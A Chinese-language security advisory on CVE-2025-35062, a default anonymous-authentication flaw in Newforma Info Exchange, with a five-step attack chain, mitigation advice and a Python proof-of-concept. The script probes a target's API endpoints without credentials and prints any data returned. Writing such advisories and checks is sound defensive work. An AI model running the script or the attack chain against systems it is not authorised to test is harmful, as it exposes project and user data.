CVE-2025-35062 Newforma Info Exchange默认匿名认证漏洞

漏洞信息

漏洞编号

CVE-2025-35062

漏洞类型

认证缺陷/默认配置漏洞

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Newforma Info Exchange (NIX)

漏洞概述

CVE-2025-35062是Newforma Info Exchange（NIX）信息交换平台中存在的一个安全配置缺陷漏洞。该漏洞源于NIX在默认安装配置下允许匿名（anonymous）认证访问，这意味着任何未经身份验证的远程攻击者都可以直接访问系统，而无需提供任何凭据。这一默认配置问题本身虽然不会直接造成严重的数据破坏或系统入侵，但它极大地降低了攻击者的攻击门槛，为利用其他需要认证的漏洞提供了便利条件。攻击者可以借助匿名认证绕过身份验证机制，进而利用系统中存在的其他安全漏洞实施进一步攻击。CVSS评分为5.3分，属于中等严重级别。该漏洞的机密性影响为低，表明攻击者主要可以获取部分敏感信息，但不会直接破坏数据完整性或系统可用性。受影响的版本为Newforma Info Exchange 2023.1之前的所有版本。该漏洞已被CISA收录并发布了相应的安全公告（VA-25-282-01），建议相关用户及时采取修复措施。

技术细节

Newforma Info Exchange（NIX）是一款用于建筑、工程和施工（AEC）行业的信息交换和项目协作平台。该漏洞的核心技术问题在于其默认认证配置不当。具体而言，NIX在部署时默认启用了匿名认证模式（anonymous authentication），允许客户端在不提供有效凭据的情况下与服务端建立连接并获取访问权限。从技术实现角度看，匿名认证通常在以下场景中被合理使用：公共信息检索、目录服务发现等。但在NIX的场景中，匿名认证被错误地设置为默认且全局启用的状态，导致整个应用的功能接口（包括一些本应需要身份验证才能访问的接口）都暴露在匿名访问之下。攻击者只需通过网络直接连接到NIX服务端口，即可利用匿名认证绕过身份验证环节。CVSS向量中的AV:N（网络攻击向量）、PR:N（无需权限）、UI:N（无需用户交互）均反映了该漏洞的远程可利用性和低利用难度。攻击者一旦通过匿名认证获得访问权限，便可利用系统中其他需要认证上下文的漏洞实施进一步攻击，如信息泄露、权限提升等。该漏洞的修复方式是在版本2023.1中更改了默认认证配置，禁用了匿名认证或将其限制在必要的范围内。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过网络扫描或资产发现，识别目标网络中暴露的Newforma Info Exchange（NIX）服务端口和接口。

STEP 2

步骤2：匿名认证探测

攻击者直接向NIX服务发送未携带任何凭据的HTTP请求，利用系统默认开启的匿名认证机制绕过身份验证环节。

STEP 3

步骤3：访问受限资源

成功通过匿名认证后，攻击者可访问本应需要身份验证的API接口和功能模块，获取项目信息、用户数据等敏感内容。

STEP 4

步骤4：利用其他漏洞

攻击者在获得认证上下文的基础上，进一步利用系统中存在的其他需要认证的安全漏洞（如信息泄露、权限提升等）实施更深层次的攻击。

STEP 5

步骤5：数据窃取

攻击者通过组合利用匿名认证漏洞和其他漏洞，窃取项目文档、用户凭据、商业机密等敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-35062 PoC - Newforma Info Exchange Anonymous Authentication
# This PoC demonstrates the anonymous authentication bypass vulnerability

import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-nix-server:port"

def check_anonymous_auth(target_url):
    """
    Check if the Newforma Info Exchange (NIX) server allows anonymous authentication.
    If successful, the server is vulnerable to CVE-2025-35062.
    """
    # Attempt to access the NIX service endpoints without providing any credentials
    endpoints = [
        "/api/v1/info",
        "/api/v1/projects",
        "/api/v1/users",
        "/nix/api/auth/anonymous",
        "/InfoExchange/api/system/status"
    ]

    headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "application/json"
    }

    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            # Attempt anonymous access without any authentication credentials
            response = requests.get(url, headers=headers, timeout=10, verify=False)

            if response.status_code == 200:
                print(f"[+] VULNERABLE: Anonymous access granted at {url}")
                print(f"[+] Response: {response.text[:500]}")
                return True
            elif response.status_code == 401:
                print(f"[-] Auth required at {url} (not vulnerable)")
            else:
                print(f"[?] Status {response.status_code} at {url}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error connecting to {url}: {e}")

    return False

if __name__ == "__main__":
    print(f"[*] Testing CVE-2025-35062 against {TARGET_URL}")
    if check_anonymous_auth(TARGET_URL):
        print("[!] Target is vulnerable to CVE-2025-35062")
    else:
        print("[-] Target does not appear to be vulnerable")

影响范围

Newforma Info Exchange (NIX) < 2023.1

防御指南

临时缓解措施

在无法立即升级的情况下，建议管理员立即修改NIX的认证配置，禁用默认的匿名认证功能，限制仅允许经过身份验证的用户访问系统。同时，应在网络边界部署访问控制策略，仅允许可信IP地址访问NIX服务，并持续监控系统日志以发现潜在的未授权访问行为。